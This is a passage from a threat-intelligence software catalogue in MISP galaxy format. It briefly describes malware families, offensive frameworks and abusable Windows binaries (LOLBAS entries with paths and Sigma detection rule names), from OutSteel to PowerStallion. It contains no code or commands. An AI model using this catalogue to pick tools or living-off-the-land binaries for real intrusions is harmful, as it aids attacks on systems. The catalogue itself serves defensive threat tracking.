[OutSteel](https://app.tidalcyber.com/software/042fe42b-f60e-45e1-b47d-a913e0677976) is a file uploader and document stealer developed with the scripting language AutoIT that has been used by [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) since at least March 2021.<sup>[[Palo Alto Unit 42 OutSteel SaintBot February 2022 ](https://app.tidalcyber.com/references/b0632490-76be-4018-982d-4b73b3d13881)]</sup>

The tag is: misp-galaxy:software="OutSteel"

OwaAuth

[OwaAuth](https://app.tidalcyber.com/software/6d8a8510-e6f1-49a7-b3a5-bd4664937147) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5). <sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup>

The tag is: misp-galaxy:software="OwaAuth"

Peer-to-Peer ZeuS - Associated Software

The tag is: misp-galaxy:software="Peer-to-Peer ZeuS - Associated Software"

Gameover ZeuS - Associated Software

The tag is: misp-galaxy:software="Gameover ZeuS - Associated Software"

P2P ZeuS

[P2P ZeuS](https://app.tidalcyber.com/software/916f8a7c-e487-4446-b6ee-c8da712a9569) is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. <sup>[[Dell P2P ZeuS](https://app.tidalcyber.com/references/773d1d91-a93c-4bb3-928b-4c3f82f2c889)]</sup>

The tag is: misp-galaxy:software="P2P ZeuS"

HEAVYPOT - Associated Software

The tag is: misp-galaxy:software="HEAVYPOT - Associated Software"

GreetCake - Associated Software

The tag is: misp-galaxy:software="GreetCake - Associated Software"

P8RAT

[P8RAT](https://app.tidalcyber.com/software/1933ad3d-3085-4b1b-82b9-ac51b440e2bf) is a fileless malware used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) to download and execute payloads since at least 2020.<sup>[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]</sup>

The tag is: misp-galaxy:software="P8RAT"

Pacu

Pacu is an open-source AWS exploitation framework. The tool is written in Python and publicly available on GitHub.<sup>[[GitHub Pacu](https://app.tidalcyber.com/references/bda43b1b-ea8d-4371-9984-6d8a7cc24965)]</sup>

The tag is: misp-galaxy:software="Pacu"

Pandora

[Pandora](https://app.tidalcyber.com/software/320b0784-4f0f-46ea-99e9-c34bfcca1c2e) is a multistage kernel rootkit with backdoor functionality that has been in use by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) since at least 2020.<sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:software="Pandora"

Pasam

The tag is: misp-galaxy:software="Pasam"

Pass-The-Hash Toolkit

[Pass-The-Hash Toolkit](https://app.tidalcyber.com/software/8d007d52-8898-494c-8d72-354abd93da1e) is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. <sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:software="Pass-The-Hash Toolkit"

PasswordFox

PasswordFox is a tool used to recover passwords from Firefox web browser.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="PasswordFox"

Fobushell - Associated Software

<sup>[[NCCIC AR-17-20045 February 2017](https://app.tidalcyber.com/references/b930e838-649b-42ab-86dc-0443667276de)]</sup>

The tag is: misp-galaxy:software="Fobushell - Associated Software"

P.A.S. Webshell

[P.A.S. Webshell](https://app.tidalcyber.com/software/4d79530c-2fd9-4438-a8da-74f42119695a) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.<sup>[[ANSSI Sandworm January 2021](https://app.tidalcyber.com/references/5e619fef-180a-46d4-8bf5-998860b5ad7e)]</sup>

The tag is: misp-galaxy:software="P.A.S. Webshell"

Pay2Key

[Pay2Key](https://app.tidalcyber.com/software/9aa21e50-726e-4002-8b7b-75697a03eb2b) is a ransomware written in C++ that has been used by [Fox Kitten](https://app.tidalcyber.com/groups/7094468a-2310-48b5-ad24-e669152bd66d) since at least July 2020 including campaigns against Israeli companies. [Pay2Key](https://app.tidalcyber.com/software/9aa21e50-726e-4002-8b7b-75697a03eb2b) has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.<sup>[[ClearkSky Fox Kitten February 2020](https://app.tidalcyber.com/references/a5ad6321-897a-4adc-9cdd-034a2538e3d6)]</sup><sup>[[Check Point Pay2Key November 2020](https://app.tidalcyber.com/references/e4ea263d-f70e-4f9c-92a1-cb0e565a5ae9)]</sup>

The tag is: misp-galaxy:software="Pay2Key"

Pcalua.exe - Associated Software

<sup>[[Pcalua.exe - LOLBAS Project](/references/958064d4-7f9f-46a9-b475-93d6587ed770)]</sup>

The tag is: misp-galaxy:software="Pcalua.exe - Associated Software"

Pcalua

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Program Compatibility Assistant

Author: Oddvar Moe

Paths: * C:\Windows\System32\pcalua.exe

Detection: * Sigma: [proc_creation_win_lolbin_pcalua.yml]([Pcalua.exe - LOLBAS Project(/references/958064d4-7f9f-46a9-b475-93d6587ed770)]</sup>

The tag is: misp-galaxy:software="Pcalua"

PCHunter

PCHunter is a tool used to enable advanced task management, including for system processes and kernels.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="PCHunter"

PcShare

[PcShare](https://app.tidalcyber.com/software/71eb2211-39aa-4b89-bd51-9dcabd363149) is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.<sup>[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]</sup><sup>[[GitHub PcShare 2014](https://app.tidalcyber.com/references/f113559f-a6da-43bc-bc64-9ff7155b82bc)]</sup>

The tag is: misp-galaxy:software="PcShare"

Pcwrun.exe - Associated Software

<sup>[[Pcwrun.exe - LOLBAS Project](/references/b5946ca4-1f1b-4cba-af2f-0b99d6fff8b0)]</sup>

The tag is: misp-galaxy:software="Pcwrun.exe - Associated Software"

Pcwrun

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Program Compatibility Wizard

Author: Oddvar Moe

Paths: * C:\Windows\System32\pcwrun.exe

Detection: * Sigma: [proc_creation_win_lolbin_pcwrun_follina.yml]([Pcwrun.exe - LOLBAS Project(/references/b5946ca4-1f1b-4cba-af2f-0b99d6fff8b0)]</sup>

The tag is: misp-galaxy:software="Pcwrun"

Pcwutl.dll - Associated Software

<sup>[[Pcwutl.dll - LOLBAS Project](/references/1050758d-20da-4c4a-83d3-40aeff3db9ca)]</sup>

The tag is: misp-galaxy:software="Pcwutl.dll - Associated Software"

Pcwutl

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft HTML Viewer

Author: LOLBAS Team

Paths: * c:\windows\system32\pcwutl.dll * c:\windows\syswow64\pcwutl.dll

Detection: * Analysis: [https://redcanary.com/threat-detection-report/techniques/rundll32/](https://redcanary.com/threat-detection-report/techniques/rundll32/) * Sigma: [proc_creation_win_rundll32_susp_activity.yml]([Pcwutl.dll - LOLBAS Project(/references/1050758d-20da-4c4a-83d3-40aeff3db9ca)]</sup>

The tag is: misp-galaxy:software="Pcwutl"

Peirates

[Peirates](https://app.tidalcyber.com/software/52a19c73-2454-4893-8f84-8d05c37a9472) is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.<sup>[[Peirates GitHub](https://app.tidalcyber.com/references/a75cde8b-76e4-4dc3-b1d5-cf08479905e7)]</sup>

The tag is: misp-galaxy:software="Peirates"

Penquin 2.0 - Associated Software

<sup>[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]</sup>

The tag is: misp-galaxy:software="Penquin 2.0 - Associated Software"

Penquin_x64 - Associated Software

<sup>[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]</sup>

The tag is: misp-galaxy:software="Penquin_x64 - Associated Software"

Penquin

[Penquin](https://app.tidalcyber.com/software/951fad62-f636-4c01-b924-bb0ce87f5b20) is a remote access trojan (RAT) with multiple versions used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) to target Linux systems since at least 2014.<sup>[[Kaspersky Turla Penquin December 2014](https://app.tidalcyber.com/references/957edb5c-b893-4968-9603-1a6b8577f3aa)]</sup><sup>[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]</sup>

The tag is: misp-galaxy:software="Penquin"

Peppy

The tag is: misp-galaxy:software="Peppy"

Pester.bat - Associated Software

<sup>[[Pester.bat - LOLBAS Project](/references/93f281f6-6fcc-474a-b222-b303ea417a18)]</sup>

The tag is: misp-galaxy:software="Pester.bat - Associated Software"

Pester

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used as part of the Powershell pester

Author: Oddvar Moe

Paths: * c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat * c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat

Resources: * [https://twitter.com/Oddvarmoe/status/993383596244258816](https://twitter.com/Oddvarmoe/status/993383596244258816) * [https://twitter.com/st0pp3r/status/1560072680887525378](https://twitter.com/st0pp3r/status/1560072680887525378) * [https://twitter.com/st0pp3r/status/1560072680887525378](https://twitter.com/st0pp3r/status/1560072680887525378)

Detection: * Sigma: [proc_creation_win_lolbin_pester_1.yml]([Pester.bat - LOLBAS Project(/references/93f281f6-6fcc-474a-b222-b303ea417a18)]</sup>

The tag is: misp-galaxy:software="Pester"

Pikabot

Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the Add to Matrix button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).

Pikabot is a malware first observed in early 2023 that has downloader/dropper and backdoor functionality. Researchers observed Pikabot distribution increase following the disruption of the QakBot botnet by authorities in August 2023. Originally distributed via spam email campaigns, researchers observed the threat actor TA577 (previously known for distributing payloads including QakBot, IcedID, SystemBC, and Cobalt Strike) distributing Pikabot starting in December 2023.<sup>[[Malwarebytes Pikabot December 15 2023](/references/50b29ef4-7ade-4672-99b6-fdf367170a5b)]</sup>

The tag is: misp-galaxy:software="Pikabot"

Pillowmint

[Pillowmint](https://app.tidalcyber.com/software/db5d718b-1344-4aa2-8e6a-54e68d8adfb1) is a point-of-sale malware used by [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) designed to capture credit card information.<sup>[[Trustwave Pillowmint June 2020](https://app.tidalcyber.com/references/31bf381d-a0fc-4a4f-8d39-832480891685)]</sup>

The tag is: misp-galaxy:software="Pillowmint"

PinchDuke

The tag is: misp-galaxy:software="PinchDuke"

Ping

[Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7) is an operating system utility commonly used to troubleshoot and verify network connections. <sup>[[TechNet Ping](https://app.tidalcyber.com/references/5afc8ad5-f50d-464f-ba84-e347b3f3e994)]</sup>

The tag is: misp-galaxy:software="Ping"

PingCastle

PingCastle is a tool that can be used to enumerate Active Directory and map trust relationships. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>

The tag is: misp-galaxy:software="PingCastle"

PingPull

[PingPull](https://app.tidalcyber.com/software/4360cc62-7263-48b2-bd2a-a7737563545c) is a remote access Trojan (RAT) written in Visual C++ that has been used by [GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) since at least June 2022. [PingPull](https://app.tidalcyber.com/software/4360cc62-7263-48b2-bd2a-a7737563545c) has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.<sup>[[Unit 42 PingPull Jun 2022](https://app.tidalcyber.com/references/ac6491ab-6ef1-4091-8a15-50e2cbafe157)]</sup>

The tag is: misp-galaxy:software="PingPull"

PipeMon

The tag is: misp-galaxy:software="PipeMon"

Pisloader

[Pisloader](https://app.tidalcyber.com/software/14e65c5d-5164-41a3-92de-67fdd1d529d2) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://app.tidalcyber.com/groups/a0c31021-b281-4c41-9855-436768299fe7) and is similar to another malware family, [HTTPBrowser](https://app.tidalcyber.com/software/c4fe23f7-f18c-40f6-b431-0b104b497eaa), that has been used by the group. <sup>[[Palo Alto DNS Requests](https://app.tidalcyber.com/references/4a946c3f-ee0a-4649-8104-2bd9d90ebd49)]</sup>

The tag is: misp-galaxy:software="Pisloader"

Pktmon.exe - Associated Software

<sup>[[Pktmon.exe - LOLBAS Project](/references/8f0ad4ed-869b-4332-b091-7551262cff29)]</sup>

The tag is: misp-galaxy:software="Pktmon.exe - Associated Software"

Pktmon

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Capture Network Packets on the windows 10 with October 2018 Update or later.

Author: Derek Johnson

Paths: * c:\windows\system32\pktmon.exe * c:\windows\syswow64\pktmon.exe

Detection: * Sigma: [proc_creation_win_lolbin_pktmon.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml) * IOC: .etl files found on system<sup>[[Pktmon.exe - LOLBAS Project](/references/8f0ad4ed-869b-4332-b091-7551262cff29)]</sup>

The tag is: misp-galaxy:software="Pktmon"

PLAINTEE

[PLAINTEE](https://app.tidalcyber.com/software/9445f18a-a796-447a-a35f-94a9fb72411c) is a malware sample that has been used by [Rancor](https://app.tidalcyber.com/groups/021b3c71-6467-4e46-a413-8b726f066f2c) in targeted attacks in Singapore and Cambodia. <sup>[[Rancor Unit42 June 2018](https://app.tidalcyber.com/references/45098a85-a61f-491a-a549-f62b02dc2ecd)]</sup>

The tag is: misp-galaxy:software="PLAINTEE"

PLEAD

[PLEAD](https://app.tidalcyber.com/software/9a890a85-afbe-4c35-a3e7-1adad481bdf7) is a remote access tool (RAT) and downloader used by [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.<sup>[[TrendMicro BlackTech June 2017](https://app.tidalcyber.com/references/abb9cb19-d30e-4048-b106-eb29a6dad7fc)]</sup><sup>[[JPCert PLEAD Downloader June 2018](https://app.tidalcyber.com/references/871f4af2-ed99-4256-a74d-b8c0816a82ab)]</sup> [PLEAD](https://app.tidalcyber.com/software/9a890a85-afbe-4c35-a3e7-1adad481bdf7) has also been referred to as [TSCookie](https://app.tidalcyber.com/software/9872ab5a-c76e-4404-91f9-5b745722443b), though more recent reporting indicates likely separation between the two. [PLEAD](https://app.tidalcyber.com/software/9a890a85-afbe-4c35-a3e7-1adad481bdf7) was observed in use as early as March 2017.<sup>[[JPCert TSCookie March 2018](https://app.tidalcyber.com/references/ff1717f7-0d2e-4947-87d7-44576affe9f8)]</sup><sup>[[JPCert PLEAD Downloader June 2018](https://app.tidalcyber.com/references/871f4af2-ed99-4256-a74d-b8c0816a82ab)]</sup>

The tag is: misp-galaxy:software="PLEAD"

The tag is: misp-galaxy:software="PuTTY Link - Associated Software"

Plink is a tool used to automate Secure Shell (SSH) actions on Windows.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Plink"

DestroyRAT - Associated Software

The tag is: misp-galaxy:software="DestroyRAT - Associated Software"

Sogu - Associated Software

The tag is: misp-galaxy:software="Sogu - Associated Software"

Thoper - Associated Software

The tag is: misp-galaxy:software="Thoper - Associated Software"

TVT - Associated Software

The tag is: misp-galaxy:software="TVT - Associated Software"

Kaba - Associated Software

The tag is: misp-galaxy:software="Kaba - Associated Software"

Korplug - Associated Software

The tag is: misp-galaxy:software="Korplug - Associated Software"

PlugX

[PlugX](https://app.tidalcyber.com/software/070b56f4-7810-4dad-b85f-bdfce9c08c10) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.<sup>[[Lastline PlugX Analysis](https://app.tidalcyber.com/references/9f7fa262-cede-4f47-94ca-1534c65c86e2)]</sup><sup>[[FireEye Clandestine Fox Part 2](https://app.tidalcyber.com/references/82500741-984d-4039-8f53-b303845c2849)]</sup><sup>[[New DragonOK](https://app.tidalcyber.com/references/82c1ed0d-a41d-4212-a3ae-a1d661bede2d)]</sup><sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup>

The tag is: misp-galaxy:software="PlugX"

pngdowner

[pngdowner](https://app.tidalcyber.com/software/95c273d2-3081-4cb5-8d41-37eb4e90264d) is malware used by [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and- execute" utility. <sup>[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]</sup>

The tag is: misp-galaxy:software="pngdowner"

Pnputil.exe - Associated Software

<sup>[[Pnputil.exe - LOLBAS Project](/references/21d0419a-5454-4808-b7e6-2b1b9de08ed6)]</sup>

The tag is: misp-galaxy:software="Pnputil.exe - Associated Software"

Pnputil

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used for installing drivers

Author: Hai vaknin (lux)

Paths: * C:\Windows\system32\pnputil.exe

Resources: None Provided

Detection: * Sigma: [proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml]([Pnputil.exe - LOLBAS Project(/references/21d0419a-5454-4808-b7e6-2b1b9de08ed6)]</sup>

The tag is: misp-galaxy:software="Pnputil"

PoetRAT

[PoetRAT](https://app.tidalcyber.com/software/79b4f277-3b18-4aa7-9f96-44b35b23166b) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://app.tidalcyber.com/software/79b4f277-3b18-4aa7-9f96-44b35b23166b) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://app.tidalcyber.com/software/79b4f277-3b18-4aa7-9f96-44b35b23166b) derived its name from references in the code to poet William Shakespeare. <sup>[[Talos PoetRAT April 2020](https://app.tidalcyber.com/references/fe2a79a5-bc50-4147-b919-f3d0eb7430b6)]</sup><sup>[[Talos PoetRAT October 2020](https://app.tidalcyber.com/references/5862c90a-3bae-48d0-8749-9a6510fe3630)]</sup><sup>[[Dragos Threat Report 2020](https://app.tidalcyber.com/references/8bb3147c-3178-4449-9978-f1248b1bcb0a)]</sup>

The tag is: misp-galaxy:software="PoetRAT"

Breut - Associated Software

The tag is: misp-galaxy:software="Breut - Associated Software"

Poison Ivy - Associated Software

The tag is: misp-galaxy:software="Poison Ivy - Associated Software"

Darkmoon - Associated Software

The tag is: misp-galaxy:software="Darkmoon - Associated Software"

PoisonIvy

[PoisonIvy](https://app.tidalcyber.com/software/1d87a695-7989-49ae-ac1a-b6601db565c3) is a popular remote access tool (RAT) that has been used by many groups.<sup>[[FireEye Poison Ivy](https://app.tidalcyber.com/references/c189447e-a903-4dc2-a38b-1f4accc64e20)]</sup><sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup><sup>[[Symantec Darkmoon Aug 2005](https://app.tidalcyber.com/references/7088234d-a6fc-49ad-b4fd-2fe8ca333c1d)]</sup>

The tag is: misp-galaxy:software="PoisonIvy"

Pony

[Pony](https://app.tidalcyber.com/software/555b612e-3f0d-421d-b2a7-63eb2d1ece5f) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.<sup>[[Malwarebytes Pony April 2016](https://app.tidalcyber.com/references/f8700002-5da6-4cb8-be62-34e421d2a573)]</sup>

The tag is: misp-galaxy:software="Pony"

POORAIM

The tag is: misp-galaxy:software="POORAIM"

PoshC2

[PoshC2](https://app.tidalcyber.com/software/a3a03835-79bf-4558-8e80-7983aeb842fb) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). Although [PoshC2](https://app.tidalcyber.com/software/a3a03835-79bf-4558-8e80-7983aeb842fb) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.<sup>[[GitHub PoshC2](https://app.tidalcyber.com/references/45e79c0e-a2f6-4b56-b621-4142756bd1b1)]</sup>

The tag is: misp-galaxy:software="PoshC2"

POSHSPY

[POSHSPY](https://app.tidalcyber.com/software/b92f28c4-cbc8-4721-ac79-2d8bdf5247e5) is a backdoor that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. <sup>[[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)]</sup>

The tag is: misp-galaxy:software="POSHSPY"

PowerDuke

[PowerDuke](https://app.tidalcyber.com/software/d9e4f4a1-dd41-424e-986a-b9a39ebea805) is a backdoor that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. <sup>[[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]</sup>

The tag is: misp-galaxy:software="PowerDuke"

PowerLess

[PowerLess](https://app.tidalcyber.com/software/8b9159c1-db48-472b-9897-34325da5dca7) is a PowerShell-based modular backdoor that has been used by [Magic Hound](https://app.tidalcyber.com/groups/7a9d653c-8812-4b96-81d1-b0a27ca918b4) since at least 2022.<sup>[[Cybereason PowerLess February 2022](https://app.tidalcyber.com/references/095aaa25-b674-4313-bc4f-3227b00c0459)]</sup>

The tag is: misp-galaxy:software="PowerLess"

Power Loader

[Power Loader](https://app.tidalcyber.com/software/018ee1d9-35af-49dc-a667-11b77cd76f46) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. <sup>[[MalwareTech Power Loader Aug 2013](https://app.tidalcyber.com/references/9a9a6ca1-d7c5-4385-924b-cdeffd66602e)]</sup> <sup>[[WeLiveSecurity Gapz and Redyms Mar 2013](https://app.tidalcyber.com/references/b8d328b7-2eb3-4851-8d44-2e1bad7710c2)]</sup>

The tag is: misp-galaxy:software="Power Loader"

Powerpnt.exe - Associated Software

<sup>[[Powerpnt.exe - LOLBAS Project](/references/23c48ab3-9426-4949-9a35-d1b9ecb4bb47)]</sup>

The tag is: misp-galaxy:software="Powerpnt.exe - Associated Software"

Powerpnt

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Office binary.

Author: Reegun J (OCBC Bank)

Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe * C:\Program Files\Microsoft Office\Office16\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe * C:\Program Files\Microsoft Office\Office15\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe * C:\Program Files\Microsoft Office\Office14\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe * C:\Program Files\Microsoft Office\Office12\Powerpnt.exe * C:\Program Files\Microsoft Office\Office12\Powerpnt.exe

Detection: * Sigma: [proc_creation_win_lolbin_office.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml) * IOC: Suspicious Office application Internet/network traffic<sup>[[Powerpnt.exe - LOLBAS Project](/references/23c48ab3-9426-4949-9a35-d1b9ecb4bb47)]</sup>

The tag is: misp-galaxy:software="Powerpnt"

PowerPunch

[PowerPunch](https://app.tidalcyber.com/software/e7cdaf70-5e28-442a-b34d-894484788dc5) is a lightweight downloader that has been used by [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) since at least 2021.<sup>[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]</sup>

The tag is: misp-galaxy:software="PowerPunch"

PowerShower

[PowerShower](https://app.tidalcyber.com/software/2ca245de-77a9-4857-ba93-fd0d6988df9d) is a PowerShell backdoor used by [Inception](https://app.tidalcyber.com/groups/d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6) for initial reconnaissance and to download and execute second stage payloads.<sup>[[Unit 42 Inception November 2018](https://app.tidalcyber.com/references/5cb98fce-f386-4878-b69c-5c6440ad689c)]</sup><sup>[[Kaspersky Cloud Atlas August 2019](https://app.tidalcyber.com/references/4c3ae600-0787-4847-b528-ae3e8ff1b5ef)]</sup>

The tag is: misp-galaxy:software="PowerShower"

DNSMessenger - Associated Software

Based on similar descriptions of functionality, it appears S0145, as named by FireEye, is the same as the first stages of a backdoor named DNSMessenger by Cisco’s Talos Intelligence Group. However, FireEye appears to break DNSMessenger into two parts: S0145 and S0146. <sup>[[Cisco DNSMessenger March 2017](https://app.tidalcyber.com/references/49f22ba2-5aca-4204-858e-c2499a7050ae)]</sup> <sup>[[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]</sup>

The tag is: misp-galaxy:software="DNSMessenger - Associated Software"

POWERSOURCE

[POWERSOURCE](https://app.tidalcyber.com/software/a4700431-6578-489f-9782-52e394277296) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. <sup>[[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]</sup> <sup>[[Cisco DNSMessenger March 2017](https://app.tidalcyber.com/references/49f22ba2-5aca-4204-858e-c2499a7050ae)]</sup>

The tag is: misp-galaxy:software="POWERSOURCE"

PowerSploit

[PowerSploit](https://app.tidalcyber.com/software/82fad10d-c921-4a87-a533-49def83d002b) is an open source, offensive security framework comprised of [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. <sup>[[GitHub PowerSploit May 2012](https://app.tidalcyber.com/references/ec3edb54-9f1b-401d-a265-cd8924e5cb2b)]</sup> <sup>[[PowerShellMagazine PowerSploit July 2014](https://app.tidalcyber.com/references/7765d4f7-bf2d-43b9-a87e-74114a092645)]</sup> <sup>[[PowerSploit Documentation](https://app.tidalcyber.com/references/56628e55-94cd-4c5e-8f5a-34ffb7a45174)]</sup>

The tag is: misp-galaxy:software="PowerSploit"

PowerStallion

